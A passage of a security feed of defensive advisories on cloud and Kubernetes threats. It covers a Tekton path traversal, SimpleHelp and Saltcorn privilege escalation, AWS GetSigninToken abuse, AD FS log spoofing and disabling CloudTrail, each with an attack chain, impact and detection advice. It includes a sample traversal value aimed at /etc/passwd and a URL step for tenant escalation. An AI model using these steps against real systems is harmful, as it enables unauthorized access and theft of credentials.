<li>The attacker exploits a vulnerability allowing for unauthenticated access to sensitive data within the GitOps system.</li>
<li>The attacker leverages another vulnerability to inject malicious code into the GitOps configuration.</li>
<li>The injected code is then used to modify application deployment parameters.</li>
<li>The modified parameters lead to the deployment of compromised application versions.</li>
<li>Alternatively, the attacker exploits a denial-of-service vulnerability to disrupt the GitOps service.</li>
<li>The disrupted service prevents legitimate application deployments or updates.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of these vulnerabilities in Red Hat OpenShift GitOps can lead to data manipulation, where critical application configurations are altered without authorization. Information can be misrepresented, leading to incorrect operational decisions. A denial of service can disrupt application deployments and updates, impacting service availability. The impact depends on the specific vulnerabilities exploited and the target environment.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Review Red Hat&rsquo;s security advisories for specific CVEs related to OpenShift GitOps and apply necessary patches immediately (references).</li>
<li>Implement network segmentation to limit remote access to OpenShift GitOps instances (network_connection).</li>
<li>Monitor OpenShift GitOps logs for suspicious activity, such as unauthorized configuration changes or access attempts (file_event, process_creation).</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>openshift</category><category>gitops</category><category>vulnerability</category><category>cloud</category></item><item><title>Uncontrolled VM Growth Leading to Security Gaps in Cloud Environments</title><link>https://feed.craftedsignal.io/briefs/2024-05-vm-sprawl/</link><pubDate>Wed, 25 Mar 2026 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-05-vm-sprawl/</guid><description>Uncontrolled growth of virtual machines (VM sprawl) in cloud environments allows attackers to exploit unmonitored VMs with overly permissive access for lateral movement, data exfiltration, and ransomware deployment.</description><content:encoded><![CDATA[<p>The increasing adoption of cloud services has led to a phenomenon known as &ldquo;VM sprawl,&rdquo; where organizations experience uncontrolled growth in the number of virtual machines (VMs) provisioned across multiple cloud providers such as AWS, Azure, and GCP. This often results in VMs being left unmonitored, unpatched, and with overly broad access permissions. While cloud service providers (CSPs) offer baseline security, maintaining the ongoing security posture of these VMs falls to the customer. This creates significant security gaps, as attackers can exploit these neglected VMs to gain an initial foothold, move laterally within the cloud environment, exfiltrate data, or even deploy ransomware. Microsoft&rsquo;s 2024 State of Multicloud Security Report highlights the increasing number of workload identities assigned to VMs, further exacerbating the risk. The lack of comprehensive cloud visibility, with only 23% of organizations reporting a complete view of their cloud footprint, makes it challenging to detect and respond to these threats effectively.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A machine learning engineer provisions a new VM in the cloud for data processing tasks.</li>
<li>The VM is assigned a workload identity with overly broad read/write access to data storage and other resources, neglecting the principle of least privilege.</li>
<li>The project concludes, but the VM remains active and unmonitored, with its initial, excessive permissions intact.</li>
<li>An attacker compromises the neglected VM, exploiting its lack of patching and weak security configurations.</li>
<li>The attacker leverages the VM&rsquo;s existing identity to probe adjacent instances within the same virtual network (VNet) or virtual private cloud (VPC) using east-west traffic.</li>
<li>The attacker gains access to internal databases or storage endpoints, exploiting the VM&rsquo;s over-permissioned identity.</li>
<li>The attacker moves laterally to other VMs via internal Remote Desktop Protocol (RDP), staging data for exfiltration.</li>
<li>The attacker deploys ransomware across the cloud network, impacting critical workloads and data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromised and neglected VMs in cloud environments can lead to significant financial and reputational damage. Attackers can exfiltrate sensitive data, deploy ransomware, disrupt critical business operations, and incur substantial fines due to non-compliance with regulatory frameworks like NIST 800-53 and PCI DSS 4.0. IBM&rsquo;s Cost of a Data Breach 2025 report found that 30% of breaches affected data across multiple environments, demonstrating the wide-ranging impact of inadequate cloud security. The dwell time, or the time between initial infiltration and detection, is significantly longer for organizations lacking visibility into their cloud environments, leading to increased costs and damage. According to a recent survey, one in three SMBs reported being hit with substantial fines following a cyberattack.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement a comprehensive VM inventory across all cloud platforms to identify and track all active virtual machines. Reference: &ldquo;every organization needs to inventory its VM fleets across all cloud platforms&rdquo;.</li>
<li>Conduct regular reviews of permissions attached to VM identities, ensuring adherence to the principle of least privilege to minimize the blast radius of potential compromises. Reference: &ldquo;review the permissions attached to the identity of each VM&rdquo;.</li>
<li>Implement network micro-segmentation to restrict east-west traffic between VMs, limiting lateral movement opportunities for attackers. Reference: &ldquo;audit their settings for unnecessary ‘east-west’ and ‘north-south’ openness&rdquo;.</li>
<li>Enable and tune process creation logging on cloud VMs to detect unusual or unauthorized processes. This can be achieved via native cloud tooling or third-party endpoint detection and response (EDR) solutions. Reference: &ldquo;security tooling can keep an eye on VMs with the same rigor as applied to the endpoints on employee desks&rdquo;.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>vm-sprawl</category><category>identity-abuse</category></item><item><title>Tekton Pipelines Git Resolver Path Traversal Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-03-tekton-traversal/</link><pubDate>Tue, 24 Mar 2026 00:16:29 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-tekton-traversal/</guid><description>The Tekton Pipelines git resolver is vulnerable to path traversal via the `pathInRepo` parameter, allowing arbitrary file reads from the resolver pod's filesystem, including ServiceAccount tokens.</description><content:encoded><![CDATA[<p>The Tekton Pipelines project provides Kubernetes-style resources for declaring CI/CD pipelines. A path traversal vulnerability exists in the git resolver component, tracked as CVE-2026-33211. This vulnerability affects Tekton Pipelines versions 1.0.0 and prior to 1.0.1, 1.3.3, 1.6.1, 1.9.2, and 1.10.2. An attacker with the ability to create <code>ResolutionRequests</code> (e.g., through <code>TaskRuns</code> or <code>PipelineRuns</code> that utilize the git resolver) can exploit this flaw to read any file from the resolver pod&rsquo;s file system. A successful exploit allows attackers to retrieve sensitive information, such as ServiceAccount tokens, which are base64-encoded and returned in <code>resolutionrequest.status.data</code>. The vulnerability has been patched in versions 1.0.1, 1.3.3, 1.6.1, 1.9.2, and 1.10.2. This poses a significant risk in multi-tenant environments where lateral movement and privilege escalation are possible.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains the ability to create <code>TaskRuns</code> or <code>PipelineRuns</code> within a Tekton Pipelines environment.</li>
<li>The attacker crafts a malicious <code>ResolutionRequest</code> that leverages the git resolver.</li>
<li>Within the <code>ResolutionRequest</code>, the attacker injects a path traversal sequence into the <code>pathInRepo</code> parameter, such as &ldquo;../../../../etc/passwd&rdquo;.</li>
<li>The git resolver attempts to resolve the resource using the provided path.</li>
<li>Due to the path traversal vulnerability, the resolver accesses the file specified by the attacker on the resolver pod&rsquo;s file system.</li>
<li>The contents of the accessed file are read by the resolver.</li>
<li>The resolver encodes the file content in base64.</li>
<li>The base64-encoded content is returned in the <code>resolutionrequest.status.data</code> field, allowing the attacker to retrieve the content. This can include sensitive files such as ServiceAccount tokens.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-33211 allows attackers to read arbitrary files from the Tekton Pipelines resolver pod. This can lead to the compromise of sensitive information, including ServiceAccount tokens. If ServiceAccount tokens are compromised, attackers can potentially gain unauthorized access to Kubernetes resources, leading to privilege escalation, lateral movement within the cluster, and potential data exfiltration. The impact is especially high in multi-tenant environments.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Tekton Pipelines to versions 1.0.1, 1.3.3, 1.6.1, 1.9.2, or 1.10.2 or later to patch CVE-2026-33211.</li>
<li>Implement strict RBAC policies to limit the ability to create <code>TaskRuns</code> and <code>PipelineRuns</code> to only authorized users and service accounts.</li>
<li>Monitor Kubernetes API audit logs for suspicious <code>ResolutionRequest</code> creation events (see rule: &ldquo;Detect Suspicious ResolutionRequest Creation&rdquo;).</li>
<li>Implement network policies to restrict network access from the resolver pod to only necessary resources.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>tekton</category><category>path-traversal</category><category>kubernetes</category><category>cve-2026-33211</category><category>cloud</category></item><item><title>Detect AWS Route Table Modification via CloudTrail</title><link>https://feed.craftedsignal.io/briefs/2024-11-aws-route-added/</link><pubDate>Fri, 01 Nov 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-11-aws-route-added/</guid><description>An attacker may add a new route to an AWS route table, potentially redirecting network traffic for malicious purposes such as defense impairment or data exfiltration.</description><content:encoded><![CDATA[<p>The addition of a new route to an AWS route table can be a sign of malicious activity, especially if the route redirects traffic to an unexpected or unauthorized destination. This activity is typically logged in AWS CloudTrail. Attackers might add routes to intercept network traffic, conduct man-in-the-middle attacks, or impair defenses by routing traffic away from security appliances. Understanding who is performing this action and the destination of the new route is critical for identifying potential threats within an AWS environment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to an AWS account, potentially through compromised credentials or an exploited vulnerability.</li>
<li>The attacker uses the AWS CLI or the AWS Management Console to interact with the EC2 service.</li>
<li>The attacker identifies the target route table to modify.</li>
<li>The attacker executes the <code>CreateRoute</code> API call, specifying the destination CIDR block and target (e.g., an internet gateway, virtual private gateway, or network interface).</li>
<li>CloudTrail logs the <code>CreateRoute</code> event, capturing details of the action, including the user identity, source IP address, and the route table modification.</li>
<li>Network traffic matching the new route&rsquo;s destination CIDR block is now redirected to the attacker-controlled target.</li>
<li>The attacker monitors and potentially modifies the redirected traffic for reconnaissance or data exfiltration purposes.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful modification of AWS route tables can lead to significant security breaches. An attacker could redirect critical network traffic to a malicious endpoint, enabling them to intercept sensitive data or disrupt services. This could lead to data breaches, financial loss, and reputational damage. The scope of the impact depends on the criticality of the redirected traffic and the attacker&rsquo;s objectives.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the &ldquo;Detect AWS Route Table Modification via CloudTrail&rdquo; Sigma rule to your SIEM and tune for your environment to detect suspicious route creation events in AWS CloudTrail logs.</li>
<li>Investigate any <code>CreateRoute</code> events where the user identity is unexpected or the destination CIDR block and target are suspicious.</li>
<li>Monitor AWS CloudTrail logs for <code>CreateRoute</code> events and correlate them with other suspicious activities.</li>
<li>Implement strict IAM policies to limit who can modify route tables (reference the <code>eventSource</code> and <code>eventName</code> fields in the rule below).</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>network-routing</category></item><item><title>New AWS Network ACL Entry Creation Detected</title><link>https://feed.craftedsignal.io/briefs/2024-10-aws-network-acl-created/</link><pubDate>Sat, 26 Oct 2024 14:27:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-10-aws-network-acl-created/</guid><description>Detection of new Network ACL entries in AWS CloudTrail logs can indicate potential defense impairment or the opening of new attack vectors within an AWS account by an adversary.</description><content:encoded><![CDATA[<p>The creation of new Network Access Control List (ACL) entries in Amazon Web Services (AWS) environments can be a sign of malicious activity. While legitimate use cases exist, adversaries can leverage these ACL changes to impair existing defenses, create new pathways for lateral movement, or establish persistence mechanisms. This activity is logged by CloudTrail and can be monitored to identify unauthorized or suspicious modifications to network security configurations. Attackers could create overly permissive rules that allow unauthorized access to critical resources or restrictive rules that disrupt legitimate traffic. Monitoring the creation of Network ACL entries is important for maintaining the integrity and security of AWS environments.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to an AWS account, potentially through compromised credentials or an exploited vulnerability.</li>
<li>The attacker identifies the existing Network ACLs within the target Virtual Private Cloud (VPC).</li>
<li>The attacker uses the AWS Management Console, CLI, or API to create a new Network ACL entry. The <code>CreateNetworkAclEntry</code> event is logged in CloudTrail.</li>
<li>The new ACL entry may be configured to allow specific inbound or outbound traffic that was previously blocked, effectively opening a new attack vector.</li>
<li>Alternatively, the new ACL entry may be configured to deny legitimate traffic, causing a denial-of-service condition for specific services or resources.</li>
<li>The attacker leverages the newly created ACL entry to move laterally within the AWS environment, accessing previously inaccessible resources.</li>
<li>The attacker performs malicious actions, such as data exfiltration or resource compromise, using the newly opened network pathways.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The creation of unauthorized Network ACL entries can have significant consequences. It can lead to the opening of new attack vectors, allowing unauthorized access to sensitive data and critical resources. In some scenarios, it can result in a denial-of-service condition, disrupting legitimate business operations. Depending on the scope of the compromised resources and data, the impact can range from minor inconvenience to significant financial loss and reputational damage. Early detection of this activity is crucial to mitigating potential risks.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;New Network ACL Entry Added&rdquo; to your SIEM to detect suspicious ACL modifications (logsource: aws, service: cloudtrail).</li>
<li>Investigate any <code>CreateNetworkAclEntry</code> events that deviate from established baseline configurations or involve unexpected source/destination IP ranges.</li>
<li>Review and audit existing Network ACL configurations regularly to identify and remediate any overly permissive or restrictive rules.</li>
<li>Implement multi-factor authentication (MFA) for all AWS accounts to reduce the risk of credential compromise and unauthorized access.</li>
<li>Monitor CloudTrail logs for other related events, such as <code>DeleteNetworkAclEntry</code> or <code>ReplaceNetworkAclEntry</code>, which may indicate further tampering with network security configurations.</li>
</ul>
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>attack.defense-impairment</category><category>attack.t1686.001</category><category>cloud</category></item><item><title>SimpleHelp Missing Authorization Vulnerability Leads to Privilege Escalation</title><link>https://feed.craftedsignal.io/briefs/2024-06-simplehelp-privesc/</link><pubDate>Tue, 25 Jun 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-06-simplehelp-privesc/</guid><description>A missing authorization vulnerability in SimpleHelp (CVE-2024-57726) allows low-privileged technicians to create API keys with excessive permissions, potentially escalating privileges to the server admin role.</description><content:encoded><![CDATA[<p>CVE-2024-57726 affects SimpleHelp, a remote support software solution. This vulnerability stems from a missing authorization check, allowing low-privileged technicians to create API keys with elevated permissions beyond their intended scope. Specifically, these API keys can be manipulated to grant server admin privileges, potentially enabling unauthorized access to sensitive data and critical system configurations. The vulnerability impacts SimpleHelp versions 5.5.7 and earlier. Successful exploitation allows attackers to bypass intended access controls, gain complete control over the SimpleHelp server, and potentially pivot to other systems within the network. This vulnerability was disclosed in January 2025, and organizations using affected SimpleHelp versions are at risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A low-privileged technician logs into the SimpleHelp console with their existing credentials.</li>
<li>The technician leverages the missing authorization vulnerability to create a new API key.</li>
<li>During API key creation, the attacker manipulates the request to assign excessive permissions beyond their authorized access level.</li>
<li>The attacker uses the newly created API key to authenticate against the SimpleHelp API.</li>
<li>The attacker leverages the elevated permissions granted by the manipulated API key to access administrative functions.</li>
<li>The attacker escalates their privileges to the server admin role, granting them complete control over the SimpleHelp server.</li>
<li>The attacker uses the server admin role to access sensitive data, modify system configurations, or create new administrative accounts.</li>
<li>The attacker potentially pivots to other systems within the network using the compromised SimpleHelp server as a stepping stone.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2024-57726 allows low-privileged technicians, or malicious actors who have compromised technician accounts, to escalate their privileges to the server admin role in SimpleHelp. This grants them complete control over the SimpleHelp server, potentially leading to data breaches, system downtime, and further compromise of the network. The vulnerability affects organizations using SimpleHelp versions 5.5.7 and earlier. The number of victims and specific sectors targeted remain unknown, but the potential impact is significant due to the sensitive nature of remote support software.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply mitigations provided by SimpleHelp to patch the missing authorization vulnerability in SimpleHelp versions 5.5.7 and earlier (reference: <a href="https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier)">https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier)</a>.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious SimpleHelp API Key Creation</code> to identify attempts to create API keys with excessive permissions.</li>
<li>Follow applicable BOD 22-01 guidance for cloud services or discontinue use of SimpleHelp if mitigations are unavailable.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>privilege-escalation</category><category>missing-authorization</category><category>cloud</category></item><item><title>Potential Abuse of AWS Console GetSigninToken</title><link>https://feed.craftedsignal.io/briefs/2024-04-aws-get-signin-token-abuse/</link><pubDate>Mon, 29 Apr 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-04-aws-get-signin-token-abuse/</guid><description>Adversaries may abuse the AWS GetSigninToken API to create temporary federated credentials for obfuscating compromised AWS access keys and pivoting to console sessions without MFA, potentially leading to lateral movement within the AWS environment.</description><content:encoded><![CDATA[<p>The AWS GetSigninToken API, typically used for legitimate console access, can be abused by attackers to generate temporary, federated credentials. This technique, often facilitated by tools like <code>aws_consoler</code>, allows attackers to obfuscate the compromised access keys used to generate the tokens. By pivoting from the AWS CLI to console sessions with these temporary credentials, adversaries bypass MFA requirements and complicate forensic investigations. This activity is crucial for defenders to monitor, especially in environments not configured for AWS SSO, as it can indicate unauthorized access and lateral movement within the AWS infrastructure. The tool <code>aws_consoler</code> is specifically designed to automate this process, creating a streamlined path for malicious actors to leverage compromised credentials for further exploitation.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to AWS environment using compromised credentials (access key, secret key).</li>
<li>The attacker uses the compromised credentials with the AWS CLI or SDK to call the <code>GetSigninToken</code> API.</li>
<li>AWS CloudTrail logs the <code>GetSigninToken</code> event with the event source <code>signin.amazonaws.com</code> and event name <code>GetSigninToken</code>.</li>
<li>The <code>GetSigninToken</code> API returns a temporary sign-in token.</li>
<li>The attacker uses the temporary token along with the AWS account ID to construct a sign-in URL.</li>
<li>The attacker accesses the AWS Management Console via the crafted URL, bypassing MFA if the original compromised credentials required it.</li>
<li>Once in the console, the attacker performs reconnaissance, identifies valuable resources, and escalates privileges as needed.</li>
<li>The attacker moves laterally within the AWS environment, accessing and potentially exfiltrating sensitive data, or disrupting services.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful abuse of the <code>GetSigninToken</code> API can lead to unauthorized access to the AWS Management Console, enabling lateral movement and data exfiltration.  The obfuscation of the original compromised credentials makes incident response more difficult. While the exact number of victims is unknown, this technique has been observed in intrusions targeting telecom and BPO companies.  The impact includes potential data breaches, service disruptions, and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect suspicious <code>GetSigninToken</code> events in AWS CloudTrail logs.</li>
<li>Investigate any <code>GetSigninToken</code> events originating from outside of expected AWS SSO user agents or other known legitimate sources.</li>
<li>Monitor AWS CloudTrail logs for <code>GetSigninToken</code> events where the requesting user identity does not match expected patterns.</li>
<li>Implement and enforce MFA for all AWS IAM users, even though this attack bypasses it for console access using the temporary tokens.</li>
<li>Review and restrict IAM policies to adhere to the principle of least privilege, minimizing the potential impact of compromised credentials.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>aws</category><category>cloud</category><category>lateral-movement</category><category>credential-access</category></item><item><title>Saltcorn Data Tenant Admin Privilege Escalation via Tenant Creation</title><link>https://feed.craftedsignal.io/briefs/2024-01-saltcorn-tenant-creation-vuln/</link><pubDate>Tue, 30 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-saltcorn-tenant-creation-vuln/</guid><description>A vulnerability in Saltcorn Data allows tenant admins to gain unauthorized admin-level access to the root domain by creating tenants in the root domain's schema instead of their own.</description><content:encoded><![CDATA[<p>A privilege escalation vulnerability exists in Saltcorn Data, affecting versions prior to 1.4.4, versions between 1.5.0-beta.0 and 1.5.2, and versions between 1.6.0-alpha.0 and 1.6.0-beta.2. The vulnerability allows tenant administrators, who are logged out of the root domain but authenticated within their own tenant space, to create new tenants within the root domain&rsquo;s database schema. This occurs because the system incorrectly evaluates the tenant&rsquo;s role within the context of the root domain during tenant creation. By appending <code>/tenant/create</code> to their tenant URL, a tenant admin with sufficient privileges in their tenant can bypass root domain restrictions and create subtenants in the root domain.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to their assigned tenant with administrator privileges.</li>
<li>Attacker logs out of the root domain (e.g., <code>saltcorn.com</code>).</li>
<li>Attacker navigates to the tenant-specific URL, where they have admin rights.</li>
<li>Attacker appends <code>/tenant/create</code> to the tenant URL (e.g., <code>tenant.saltcorn.com/tenant/create</code>).</li>
<li>The application evaluates the user&rsquo;s role in the context of the tenant (admin role).</li>
<li>The application then attempts to create a new tenant but incorrectly does so under the root domain&rsquo;s <code>_sc_tenants</code> schema instead of the tenant&rsquo;s.</li>
<li>The new tenant is created in the root domain (PUBLIC SCHEMA &gt; <code>_sc_tenants</code>).</li>
<li>The attacker effectively gains the ability to create tenants in the root domain, escalating privileges.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability grants tenant administrators unauthorized admin-level access to the root domain of the Saltcorn Data instance. This could lead to unauthorized modification or deletion of data within the root domain, disruption of service for all tenants hosted on the instance, and potential further escalation of privileges within the system. The advisory does not state specific victim counts or sectors targeted, but the impact is significant due to the potential for widespread disruption and data compromise.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Saltcorn Data to a patched version (&gt;= 1.4.4, &gt;= 1.5.2, or &gt;= 1.6.0-beta.2) to remediate the vulnerability (reference: Affected Packages).</li>
<li>Monitor web server logs for requests to the <code>/tenant/create</code> endpoint originating from tenant administrator sessions to detect potential exploitation attempts (reference: Sigma rule <code>Detect Saltcorn Unauthorized Tenant Creation</code>).</li>
<li>Implement additional server-side validation to ensure tenant creation requests are properly scoped to the originating tenant&rsquo;s schema (reference: advisory summary).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>privilege-escalation</category><category>web-application</category><category>cloud</category></item><item><title>Kubernetes Cluster Enumeration via Audit Logs</title><link>https://feed.craftedsignal.io/briefs/2024-01-kubernetes-enumeration/</link><pubDate>Mon, 29 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-kubernetes-enumeration/</guid><description>Attackers attempt to enumerate and discover sensitive information within a Kubernetes cluster by leveraging common shells, utilities, and specialized tools, as reflected in audit logs.</description><content:encoded><![CDATA[<p>Attackers are increasingly targeting Kubernetes environments to gain unauthorized access and extract sensitive information. This activity often begins with enumeration and reconnaissance to map out the cluster&rsquo;s configuration, identify potential vulnerabilities, and locate valuable secrets. This involves the use of standard command-line tools and specialized Kubernetes utilities. Audit logs provide a valuable record of these enumeration attempts, particularly API requests containing shell commands, file transfer utilities, or tools like Rakkess and TruffleHog. This activity is typically aimed at reconnaissance, secret harvesting, or code execution within the cluster. Detecting these patterns in audit logs is critical for identifying and responding to potential breaches.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a system with Kubernetes API access, potentially through compromised credentials or a vulnerable application.</li>
<li>The attacker authenticates to the Kubernetes API server.</li>
<li>The attacker sends a request to the Kubernetes API to execute a shell within a pod, such as <code>/bin/bash</code> or <code>/bin/sh</code>, potentially URL-encoded.</li>
<li>The attacker uses <code>kubectl</code> within a pod to gather information about cluster resources, such as pods, services, and deployments.</li>
<li>The attacker attempts to download tools like <code>curl</code> or <code>wget</code> into a pod to facilitate further reconnaissance or lateral movement.</li>
<li>The attacker uses tools like <code>Rakkess</code> to enumerate role-based access control (RBAC) permissions to identify potential privilege escalation paths.</li>
<li>The attacker deploys <code>TruffleHog</code> to scan pod environments for exposed secrets, such as API keys and passwords.</li>
<li>The attacker exfiltrates gathered information and secrets or uses the gained access for lateral movement within the cluster or connected networks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful enumeration of a Kubernetes cluster can provide attackers with detailed information about the cluster&rsquo;s architecture, deployed applications, and security configurations. This allows attackers to identify vulnerabilities, escalate privileges, and gain access to sensitive data, such as API keys, passwords, and other secrets. This can lead to data breaches, service disruptions, and compromised infrastructure. The impact can range from a limited data exposure to a full-scale compromise of the entire Kubernetes environment and connected cloud resources.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the &ldquo;Kubernetes Potential Enumeration Activity&rdquo; Sigma rule to your SIEM to detect suspicious API requests containing shell commands, file transfer utilities, or specialized tools (Sigma rule).</li>
<li>Investigate any alerts triggered by the Sigma rule to determine the scope and impact of the potential enumeration activity.</li>
<li>Review and harden RBAC configurations to minimize the potential for privilege escalation (attack.t1609).</li>
<li>Implement strict network segmentation to limit lateral movement within the cluster and connected networks.</li>
<li>Regularly scan pods for exposed secrets using dedicated secret scanning tools and enforce secure secret management practices.</li>
<li>Monitor Kubernetes audit logs for unusual or unauthorized API activity (logsource: kubernetes, service: audit).</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>kubernetes</category><category>enumeration</category><category>cloud</category></item><item><title>Spoofing AD FS Signing Logs via Azure AD Hybrid Health Service</title><link>https://feed.craftedsignal.io/briefs/2024-01-23-azuread-adfs-spoofing/</link><pubDate>Tue, 23 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-23-azuread-adfs-spoofing/</guid><description>A threat actor can create a new, rogue AD Health ADFS service within Azure and then create a fake server instance, which can be leveraged to spoof AD FS signing logs without compromising on-prem AD FS servers.</description><content:encoded><![CDATA[<p>This threat involves the creation of a rogue AD FS service instance within the Azure AD Hybrid Health Service to spoof AD FS signing logs. The attacker leverages the Azure AD Hybrid Health Service to create a new AD FS service and adds a fake server instance. This method allows the attacker to manipulate AD FS logging information without needing to compromise an on-premises AD FS server. The attack can be performed programmatically through HTTP requests to Azure, making it scalable and difficult to trace back to traditional on-premises attack vectors. This technique is particularly concerning because it undermines the integrity of AD FS logs, a crucial component for security monitoring and incident response.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Compromise Azure Account:</strong> The attacker gains access to an Azure account, potentially through stolen credentials or exploiting a vulnerability.</li>
<li><strong>Provision Rogue AD Health Service:</strong> The attacker programmatically provisions a new AD Health Service within the compromised Azure environment, specifically targeting AD FS.</li>
<li><strong>Create Fake Server Instance:</strong> Within the newly created AD Health Service, the attacker creates a fake server instance, mimicking a legitimate AD FS server. The <code>ResourceId</code> will contain <code>AdFederationService</code>.</li>
<li><strong>Manipulate Logs:</strong> Using the fake server instance, the attacker injects or alters AD FS signing logs, creating a false narrative of user authentication events.</li>
<li><strong>Impersonate Users/Bypass Authentication:</strong> The attacker uses the manipulated logs to impersonate legitimate users or bypass authentication controls in applications relying on AD FS.</li>
<li><strong>Lateral Movement/Privilege Escalation:</strong> Using the falsely acquired credentials or authentication tokens, the attacker moves laterally within the network, escalating privileges to access sensitive resources.</li>
<li><strong>Data Exfiltration/System Compromise:</strong> The attacker exfiltrates sensitive data or gains control over critical systems using the compromised accounts and manipulated logs.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows attackers to spoof AD FS signing logs, potentially leading to unauthorized access, data breaches, and system compromise. The compromised logs can be used to cover the attacker&rsquo;s tracks, making detection and incident response more difficult. Organizations relying on Azure AD Hybrid Health for AD FS monitoring are at risk of having their security posture undermined. The number of potential victims is substantial, as many organizations use AD FS for authentication and rely on its logs for security monitoring.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Azure Active Directory Hybrid Health AD FS New Server</code> to your SIEM to detect the creation of new AD FS server instances within the Azure AD Hybrid Health Service. Tune the rule for your environment to minimize false positives.</li>
<li>Monitor Azure Activity Logs for any unusual activity related to the <code>Microsoft.ADHybridHealthService</code> resource provider and the <code>Microsoft.ADHybridHealthService/services/servicemembers/action</code> operation, specifically the <code>Administrative</code> category.</li>
<li>Review and validate all AD FS server instances registered within the Azure AD Hybrid Health Service to ensure their legitimacy.</li>
<li>Implement multi-factor authentication (MFA) for all Azure accounts to prevent unauthorized access and mitigate the risk of initial compromise.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cloud</category><category>azure</category><category>adfs</category><category>defense-impairment</category></item><item><title>AWS CloudTrail Logging Disabled or Modified</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-cloudtrail-disable-logging/</link><pubDate>Tue, 23 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-cloudtrail-disable-logging/</guid><description>Detection of AWS CloudTrail being disabled, deleted, or updated by an adversary to impair defenses and evade detection.</description><content:encoded><![CDATA[<p>AWS CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your AWS account. By recording API calls, CloudTrail provides a history of AWS account activity, including actions taken through the AWS Management Console, AWS SDKs, command line tools, and other AWS services. Attackers may attempt to disable or modify CloudTrail logging to remove traces of their malicious activity, hindering incident response and forensic investigations. This brief focuses on detecting actions that stop logging, update the trail configuration, or delete the trail altogether. These actions directly impact an organization&rsquo;s ability to detect and respond to security incidents within their AWS environment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to an AWS account with sufficient privileges.</li>
<li>The attacker authenticates to the AWS environment using compromised credentials or an exploited IAM role.</li>
<li>The attacker executes the <code>StopLogging</code> API call against the CloudTrail service, effectively halting the recording of events.</li>
